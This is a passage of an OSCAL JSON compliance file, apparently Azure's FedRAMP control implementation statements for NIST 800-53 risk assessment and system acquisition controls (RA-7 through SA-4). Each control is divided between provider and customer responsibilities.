statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"0bf53830-e8e0-4ea4-8688-bd88489ea89a","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"management"}],"control-id":"ra-7","statements":[{"uuid":"59cf44b5-cde8-4919-a51a-6c5259007643","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"RA-14-028"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ra-7_smt","by-components":[{"uuid":"92cf71e5-f7ed-4a03-9bb3-d9959e21c787","export":{"provided":[{"uuid":"ef1fb8a7-8c5b-4376-986d-ed827e4911d9","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"RA-14-028"}],"description":"Azure employs an approved Third-Party Assessment Organization (3PAO) as an independent assessor to conduct a security control assessment of Azure in accordance with security control requirements. Azure adds findings identified in 3PAO monthly continuous monitoring and annual audit assessments into Plan of Actions & Milestone (POA&M) spreadsheets for remediation tracking. Depending on the risk of the finding, Azure takes appropriate action to remediate findings in accordance with FedRAMP Continuous Monitoring Guidelines. 
The results of this assessment and related activities are submitted to Azure's authorizing officials."}],"responsibilities":[{"uuid":"59895e08-c698-43d2-b96d-a97b274d93ac","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"RA-14-028"}],"description":"The customer is responsible for responding to findings from security and privacy assessments, monitoring, and audits in accordance with customer risk tolerance for customer-deployed resources.","provided-uuid":"ef1fb8a7-8c5b-4376-986d-ed827e4911d9"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"2e512f8f-68c3-4b4c-b6b5-f71f677f7b86","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"management"}],"control-id":"ra-9","statements":[{"uuid":"1c59d1ef-7d60-4c97-b9a2-cd76b888a7a9","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"RA-14-029"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ra-9_smt","by-components":[{"uuid":"41e1adca-93c9-45b7-b82a-a29a955add37","export":{"provided":[{"uuid":"2602cd04-b711-434e-952e-008e8f14cbbb","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"RA-14-029"}],"description":"To identify and apply the appropriate asset classification, the Microsoft Asset Owner performs the following steps:\n\n* Business Requirements: The Asset Owner identifies any unique requirements that apply to the Online Service based on use-case scenarios and business requirements. 
This includes understanding data requirements as described in the Data Classification Standard.\n* Risk Evaluation: The Asset Owner assesses the risks to the asset and the impacts that would result if its confidentiality, integrity, or availability were to be compromised. Impact criteria are defined in the Asset Classification Standard.\n* Classification: The Asset Owner selects the appropriate classification based on the risk and valuation of the asset.\n* Protection: The Asset Owner directs the application of security protection measures and controls required by the asset classification (per the Asset Protection Standard) as well as any additional required controls.\n* Periodic Monitoring: The Asset Owner periodically reviews the risks and classification of the asset to ensure they remain appropriate, or corrects them as needed.\n\nThe criteria describe the impact that would be incurred by Microsoft, Microsoft's shareholders, partners, or customers, the Asset Owner's organization, or dependent or reliant organizations if the asset's confidentiality, integrity, or availability were to be compromised. 
In some scenarios multiple types of impact may apply; the Asset Owner then chooses the highest and/or most relevant impact when making the classification decision."}],"responsibilities":[{"uuid":"a731e05f-edec-4bae-a1f4-8e9a64c31935","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"RA-14-029"}],"description":"The customer is responsible for identifying critical information system components and functions by performing a criticality analysis for customer-defined information systems, information system components, or information system services at customer-defined decision points in the system development life cycle.","provided-uuid":"2602cd04-b711-434e-952e-008e8f14cbbb"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"2ba717f1-1973-4a01-bde1-1deffb357351","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"management"}],"control-id":"sa-2","statements":[{"uuid":"879aee04-67f1-48dc-a6b5-cbf52d1d4fbc","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-006"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sa-2_smt.a","by-components":[{"uuid":"16460076-c5ff-4cee-bf1e-75c73edf8c77","export":{"provided":[{"uuid":"910171eb-8780-4d83-a8f0-1ba9d01890dc","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-006"}],"description":"Microsoft implements the allocation of resources control as part of Phase One: Requirements, of the Microsoft Security Development Lifecycle (SDL) Process. 
The Requirements phase of the SDL includes consideration of security and privacy at a foundational level, together with a cost analysis in which a determination is made whether development and support costs for improving security and privacy are consistent with business needs. Microsoft includes a determination of security requirements at the onset of a project to allow development teams to identify key milestones and deliverables, and permits the integration of security and privacy in a way that minimizes any disruption to plans and schedules. Security and privacy requirements analysis is performed at project inception and includes specification of minimum security requirements for the application as it is designed to run in its planned operational environment, and specification and deployment of a security vulnerability/work item tracking system. Likewise, Microsoft included information security requirements for Azure in mission/business process planning consistent with the terms of the Azure offering."}],"responsibilities":[{"uuid":"b805673c-ffae-4e27-97ec-227241a3665d","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-006"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for determining the high-level information security and privacy requirements of customer-deployed resources in mission and business process planning.","provided-uuid":"910171eb-8780-4d83-a8f0-1ba9d01890dc"}]},"description":"See inheritance and customer responsibility 
statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"e70415ce-659c-4ed9-a4da-987340b1a095","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-007"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sa-2_smt.b","by-components":[{"uuid":"52ab5128-ee2f-4fb5-9432-263ae2eec630","export":{"provided":[{"uuid":"78a1a40b-c22b-4a33-bd7c-013caf2b4048","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-007"}],"description":"Microsoft annually budgets funding necessary to support all services and the corporate security and privacy posture across the entire company. Microsoft has determined, documented, and allocated the resources required to protect the information system as part of its capital budgeting process. The information security control requirements are documented in this SSP. In addition, as part of the budgeting process, C+AI Security conducts capacity planning, which includes determining the overall size, performance, and resilience of the system. These elements are important to the overall security functionality of the system in terms of how security controls impact Azure's performance, as well as how the resiliency of the system supports data availability and continuity objectives. Capacity planning depends largely upon the proposed usage of the system. Processing and storage requirements for Azure are defined before development in order to ensure adequate resources are available. Azure capacity planning includes operating requirements, projected trends, new business requirements, and resistance to denial-of-service attacks in order to avoid preventable system deficiencies. 
The capacity planning process runs through C+AI Security and is part of the budget allocation."}],"responsibilities":[{"uuid":"963eac1f-20c5-465d-9860-07aa7eea2fee","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-007"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for determining, documenting, and allocating the resources required to protect customer-deployed resources as part of capital planning and investment control.","provided-uuid":"78a1a40b-c22b-4a33-bd7c-013caf2b4048"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"bf9a4697-be09-4a85-983f-a2924c44da55","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-008"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sa-2_smt.c","by-components":[{"uuid":"1c1e0d46-d753-443a-9abf-1faa7375ed27","export":{"provided":[{"uuid":"f9ce8a2b-d8e8-45b4-8c9e-1e69621014c7","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-008"}],"description":"The Microsoft Security Program Policy (MSPP) outlines the capacity planning process to ensure adequate allocation of resources; it also includes technical requirements along with future capacity and security projections. Microsoft establishes discrete line items for information security, change management, and budgeting documentation, where required. 
Budgets are created for different departments within Microsoft and information security is considered."}],"responsibilities":[{"uuid":"8e181177-2a3f-4341-94a0-1c8b0e6d192a","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-008"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for including a discrete line item for information security in programming and budgeting documentation when allocating resources.","provided-uuid":"f9ce8a2b-d8e8-45b4-8c9e-1e69621014c7"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"c2ddf2dd-2ca2-4201-b895-3dbb7eefe13e","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"management"}],"control-id":"sa-3","statements":[{"uuid":"a969214b-3d54-47f5-95c4-c7891f14350a","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-009"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sa-3_smt.a","by-components":[{"uuid":"b5f98c5f-c3bb-444a-8bec-f45541a55cc3","export":{"provided":[{"uuid":"5f340164-640f-45a2-87d5-7d61434758df","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-009"}],"description":"Microsoft implements lifecycle support for Azure services through its Security Development Lifecycle (SDL) process. The SDL consists of a security requirements analysis and applicability that must be completed for all service development projects. 
This analysis acts as a framework and includes the identification of possible risks to the finished service as well as mitigation strategies which can be implemented and tested during the development phases. A Threat Modeling security review is included during the SDL process. Microsoft integrates essential information technology (IT) security considerations defined in NIST Special Publication 800-160 Volume 1 as revised into the established Microsoft SDL process. Pre-SDL Requirements: Security Training All members of service development teams receive appropriate training to stay informed about security basics and recent trends in security and privacy. Individuals who develop services are required to attend at least one security training class each year. Security training can help ensure services are created with security and privacy in mind and can also help development teams stay current on security issues. Project team members are strongly encouraged to seek additional security and privacy education that is appropriate to their needs or products. SDL Core Phases The Microsoft SDL process includes the following phases: * Phase 1: Requirements - The Requirements phase of the SDL includes the project inception-when the organization considers security and privacy at a foundational level-and a cost analysis-when determining if development and support costs for improving security and privacy are consistent with business needs. This phase also includes defining security roles and responsibilities and identifying individuals with these roles and responsibilities. * Phase 2: Design - The Design phase is when the organization builds the plan for how to take the project through the rest of the SDL process-from implementation, to verification, to release. 
During the Design phase the organization establishes best practices to follow for this phase by way of functional and design specifications, and by performing risk analysis to identify threats and vulnerabilities in the service. TMA (Threat Model Analysis) is required to define all attack surfaces and their associated risks; all security gaps and risks are documented and analyzed. This security impact analysis results in dataflow documentation in order to identify all intended paths for information and potential attack vectors. * Phase 3: Implementation - The Implementation phase is when the organization creates the documentation and tools the customer uses to make informed decisions about how to deploy the service securely. To this end, the Implementation phase is when the organization establishes development best practices to detect and remove security and privacy issues early in the development cycle. Microsoft understands, observes, and implements the security requirements and considerations as outlined in GSA IT Security Procedural Guide 09-48, Security Language for IT Acquisition Efforts, dated September 2009 for the information system consistent with the Azure offering's requirements. * Phase 4: Verification - During the Verification phase, the organization ensures that the code meets the security and privacy tenets established in the previous phases. This is done through security and privacy testing, and a security push-which is a team-wide focus on threat model updates, code review, testing, and thorough documentation review and edit. A public release privacy review is also completed during the Verification phase. * Phase 5: Release - The Release phase is when the organization prepares the service for consumption and prepares for what happens once the service is released. 
One of the core concepts in the Release phase is response planning-mapping out a plan of action, should any security or privacy vulnerabilities be discovered in the release-and this carries over to post-release, as well, in terms of response execution. Post-SDL Requirement: Security Servicing and Response Execution After a service is released, the product development team must be available to respond to any possible security vulnerabilities or privacy issues that warrant a response. In addition, the development team is required to follow the Azure Incident Management Standard Operating Procedure (SOP) for potential post-release issues. Azure has implemented information validation through checking of data inputs as part of the SDL process. Thorough code reviews and testing are completed during the Verification Phase of the SDL prior to service being put into a production environment. The code reviews and testing check for cases of SQL injection, format string vulnerabilities, XSS, integer arithmetic, command injection, and buffer overflow vulnerabilities. 
For more details on the SDL process, please refer to <https://www.microsoft.com/en-us/securityengineering/sdl>."}],"responsibilities":[{"uuid":"fbac0d2a-6fe7-4221-8c00-63ffb433a297","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-009"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for acquiring, developing, and managing customer-deployed resources using a system development life cycle (SDLC), that incorporates information security and privacy considerations.","provided-uuid":"5f340164-640f-45a2-87d5-7d61434758df"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"c1b66b92-59aa-4226-bffd-ba91852b5198","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-010"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sa-3_smt.b","by-components":[{"uuid":"e71d73b1-bae7-415e-97c6-032db76a2ec2","export":{"provided":[{"uuid":"6cdd933a-a6c3-457e-b3e1-0eafb5114af8","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-010"}],"description":"The SDL includes general criteria and job descriptions for security and privacy roles. These roles are filled during the Requirements Phase of the SDL process. These roles are consultative in nature, and provide the organizational structure necessary to identify, catalog, and mitigate security and privacy issues present in a service development project. 
As part of the SDL, Azure has defined a dedicated security team responsible for conducting reviews, setting standards, and monitoring compliance with regulatory requirements, standards, and policies. Specific roles and responsibilities for the team include: * C+AI Security Assurance: This role is filled by security subject-matter experts (SMEs) from outside the project team. The Security Assurance team manages the SDL program and process within C+AI and conducts threat modeling sessions for project teams. * Compliance and Privacy Advisor: The advisor (or group of individuals) from the compliance team is responsible for attesting to compliance (or non-compliance) with security and privacy requirements without interference from the project team. * Team Champions: The team champion roles are filled by SMEs from the project team. These roles are responsible for the negotiation, acceptance, and tracking of minimum security and privacy requirements and maintaining clear lines of communication with advisors and decision makers during a service development project. * A training and awareness team responsible for educating project teams about security standards, policies, and best practices. * Help desk personnel to answer common questions and, as needed, escalate to the security and privacy SMEs. * Personnel responsible for authoring checklists, standards, and even corporate policy to meet security and privacy requirements. * Account management SME that acts as a liaison with application teams, manages the application portfolio, and ensures that the process for SDL compliance runs smoothly. * Remediation and risk management personnel, who both prioritize applications for assessment and manage the remediation of high-risk vulnerabilities found during the assessment. 
* The Operations team which conducts network and host scanning post-assessment across the enterprise and production servers."}],"responsibilities":[{"uuid":"591fa849-af40-49f4-a31d-bc9714bf58bc","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-010"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for managing customer-deployed resources using a system development life cycle (SDLC), which identifies and documents information security and privacy roles and responsibilities.","provided-uuid":"6cdd933a-a6c3-457e-b3e1-0eafb5114af8"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"75e9ffd4-c0a7-49fd-8221-2f9ccfe8089f","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-011"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sa-3_smt.c","by-components":[{"uuid":"107fa36c-151e-405d-8142-2c6e4c96106f","export":{"provided":[{"uuid":"971ffb09-28f1-48d0-a354-28cd58125ee2","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-011"}],"description":"Section 5 of this SSP refers to the individuals having Information Security roles and responsibilities."}],"responsibilities":[{"uuid":"aa619b98-4c39-4699-ae51-ade893912e59","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-011"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for managing customer-deployed resources using a system development life cycle (SDLC), including the identification of individuals having 
information security and privacy roles and responsibilities.","provided-uuid":"971ffb09-28f1-48d0-a354-28cd58125ee2"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"c4ec82a2-5420-4a74-808b-bf14ee5d2da6","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-012"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sa-3_smt.d","by-components":[{"uuid":"6fbfb0bf-a708-4730-85ee-277948e06f86","export":{"provided":[{"uuid":"3f62f428-033b-4d99-a46c-02dc8971cf4d","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-012"}],"description":"Azure integrates the organizational information security risk management process into the SDL process. 
Please see Part a above for details on how Azure's SDL process facilitates the integration of the information security architecture with the organizational risk management."}],"responsibilities":[{"uuid":"9161595a-1d08-44ef-8054-c250beb1f3f9","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-012"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for integrating the customer's information security risk management process into SDLC activities.","provided-uuid":"3f62f428-033b-4d99-a46c-02dc8971cf4d"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"e819862e-192a-46d3-bff4-1f3629b653cd","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"management"}],"control-id":"sa-4","statements":[{"uuid":"fd339421-600b-4641-aa7b-dbedd0cf977b","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-013"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sa-4_smt.a","by-components":[{"uuid":"a85ff708-3b73-4ed7-93ab-b381a644e1a0","export":{"provided":[{"uuid":"578f0af3-0a14-4256-ae3e-0da25894556b","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-013"}],"description":"Azure implements the acquisitions control through enforcement of the Microsoft Security Policy (MSP). 
The Policy dictates that where a third party is allowed to (i) access, process, host or manage Microsoft's online services' information assets or information processing facilities, or (ii) add products or services to Microsoft's online services' information processing facilities, arrangements must be made in a formal contract to define responsibility and requirements for the security, confidentiality, integrity and availability of the information assets involved. Appropriate security and privacy standards are addressed in the agreement, to provide a level of protection against identified risks equivalent to that provided by the MSP. It is the role of Corporate, External, and Legal Affairs (CELA) to require language included in system acquisition contracts pertaining to the security requirements, as appropriate, through the Master Supplier Services Agreement (MSSA) or an equivalent type of agreement."}],"responsibilities":[{"uuid":"9e696b6f-b0f3-4717-8a7c-068a5ae8f43a","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-013"}],"description":"The customer is responsible for implementing an acquisition process for customer-deployed resources that includes security and privacy functional requirements, strength of mechanism requirements, security and privacy assurance requirements, necessary controls to satisfy said security and privacy requirements, documentation requirements, requirements for protecting security and privacy-related documentation, a description of the customer's development and operating environments, allocation of or identification of parties responsible for security, privacy, and supply chain risk management, and the acceptance criteria for the contract.","provided-uuid":"578f0af3-0a14-4256-ae3e-0da25894556b"}]},"description":"See inheritance and customer responsibility 
statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"36b3537f-7b26-4f6c-b033-03ee0d2f5e0c","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-014"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sa-4_smt.b","by-components":[{"uuid":"808cc35b-a24c-40cc-8c9d-39f56ce05902","export":{"provided":[{"uuid":"c0047e53-5a7d-4d08-aa02-4032ff5a5bfd","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-014"}],"description":"Microsoft requires all device security documentation and tests all security requirements and functions in lab/development environments before they are implemented in production. Whenever feasible, Microsoft has selected system components and products that have been evaluated on Common Criteria, FIPS (e.g., Federal Information Processing Standards (FIPS) 140-2), Center for Information Security, Security Content Automation Protocol (SCAP) and other standards for deployment within Azure. Microsoft engages only those third parties that have signed a contract and have been approved by the Procurement and Microsoft Corporate, External, and Legal Affairs (CELA) teams. In accordance with the MSSA, contracts require that the third party implement security procedures to prevent disclosure of Microsoft confidential information and provide all pertinent information describing the functional requirements or specifications of the security controls that are to be employed within the system. 
Additionally, third parties who have access to the Azure environment must employ a formal contract that defines the responsibilities and requirements for maintaining the security, confidentiality, integrity, and availability of the information assets involved with the contract."}],"responsibilities":[{"uuid":"b306ee66-9dba-4576-ab0e-ac02870ed156","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-014"}],"description":"The customer is responsible for implementing an acquisition process for customer-deployed resources that includes security and privacy functional requirements, strength of mechanism requirements, security and privacy assurance requirements, necessary controls to satisfy said security and privacy requirements, documentation requirements, requirements for protecting security and privacy-related documentation, a description of the customer's development and operating environments, allocation of or identification of parties responsible for security, privacy, and supply chain risk management, and the acceptance criteria for the contract.","provided-uuid":"c0047e53-5a7d-4d08-aa02-4032ff5a5bfd"}]},"description":"See inheritance and customer responsibility 
statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"5ec288fc-63c6-4f87-ad2e-e950a6484848","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-015"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sa-4_smt.c","by-components":[{"uuid":"0768ac37-b6aa-4c4c-ae1f-dd8746b91a0f","export":{"provided":[{"uuid":"6c76f7bf-ea18-4a83-a54e-3d530115f14f","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-015"}],"description":"Azure implements the acquisitions control through enforcement of the Microsoft Security Policy (MSP). The Policy dictates that where a third party is allowed to (i) access, process, host or manage Microsoft's online services' information assets or information processing facilities, or (ii) add products or services to Microsoft's online services' information processing facilities, arrangements must be made in a formal contract to define responsibility and requirements for the security, confidentiality, integrity and availability of the information assets involved. Appropriate security and privacy standards are addressed in the agreement, to provide a level of protection against identified risks equivalent to that provided by the MSP. 
It is the role of Corporate, External, and Legal Affairs (CELA) to require language included in system acquisition contracts pertaining to the security requirements, as appropriate, through the Master Supplier Services Agreement (MSSA) or an equivalent type of agreement."}],"responsibilities":[{"uuid":"c13aae19-6044-4ac5-88d6-4952a7b27ef0","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-015"}],"description":"The customer is responsible for implementing an acquisition process for customer-deployed resources that includes security and privacy functional requirements, strength of mechanism requirements, security and privacy assurance requirements, necessary controls to satisfy said security and privacy requirements, documentation requirements, requirements for protecting security and privacy-related documentation, a description of the customer's development and operating environments, allocation of or identification of parties responsible for security, privacy, and supply chain risk management, and the acceptance criteria for the contract.","provided-uuid":"6c76f7bf-ea18-4a83-a54e-3d530115f14f"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"75bd6bf4-01f9-4d1d-a040-4b1c479f1763","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-016"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sa-4_smt.d","by-components":[{"uuid":"c92f75f3-1012-4869-b98a-99844ad49e79","export":{"provided":[{"uuid":"3b3319f8-36d6-435d-b3d5-f0b79c48c799","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-016"}],"description":"Azure 
implements the acquisitions control through enforcement of the Microsoft Security Policy (MSP). The Policy dictates that where a third party is allowed to (i) access, process, host or manage Microsoft's online services' information assets or information processing facilities, or (ii) add products or services to Microsoft's online services' information processing facilities, arrangements must be made in a formal contract to define responsibility and requirements for the security, confidentiality, integrity and availability of the information assets involved. Appropriate security and privacy standards are addressed in the agreement, to provide a level of protection against identified risks equivalent to that provided by the MSP. It is the role of Corporate, External, and Legal Affairs (CELA) to require language included in system acquisition contracts pertaining to the security requirements, as appropriate, through the Master Supplier Services Agreement (MSSA) or an equivalent type of agreement."}],"responsibilities":[{"uuid":"9aaf62e4-cd1b-4f7a-a5ca-a1bf43b52b10","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-016"}],"description":"The customer is responsible for implementing an acquisition process for customer-deployed resources that includes security and privacy functional requirements, strength of mechanism requirements, security and privacy assurance requirements, necessary controls to satisfy said security and privacy requirements, documentation requirements, requirements for protecting security and privacy-related documentation, a description of the customer's development and operating environments, allocation of or identification of parties responsible for security, privacy, and supply chain risk management, and the acceptance criteria for the contract.","provided-uuid":"3b3319f8-36d6-435d-b3d5-f0b79c48c799"}]},"description":"See inheritance and customer responsibility 
statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"5e399dd9-0d08-4d51-9c97-7a8c0e88f113","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-017"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sa-4_smt.e","by-components":[{"uuid":"b2d5e2b7-74d0-4c3a-a31e-45c758b3f0b2","export":{"provided":[{"uuid":"137cd12d-fcd6-4a84-9d68-9465cba4d934","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-017"}],"description":"Azure implements the acquisitions control through enforcement of the Microsoft Security Policy (MSP). The Policy dictates that where a third party is allowed to (i) access, process, host or manage Microsoft's online services' information assets or information processing facilities, or (ii) add products or services to Microsoft's online services' information processing facilities, arrangements must be made in a formal contract to define responsibility and requirements for the security, confidentiality, integrity and availability of the information assets involved. Appropriate security and privacy standards are addressed in the agreement, to provide a level of protection against identified risks equivalent to that provided by the MSP. 
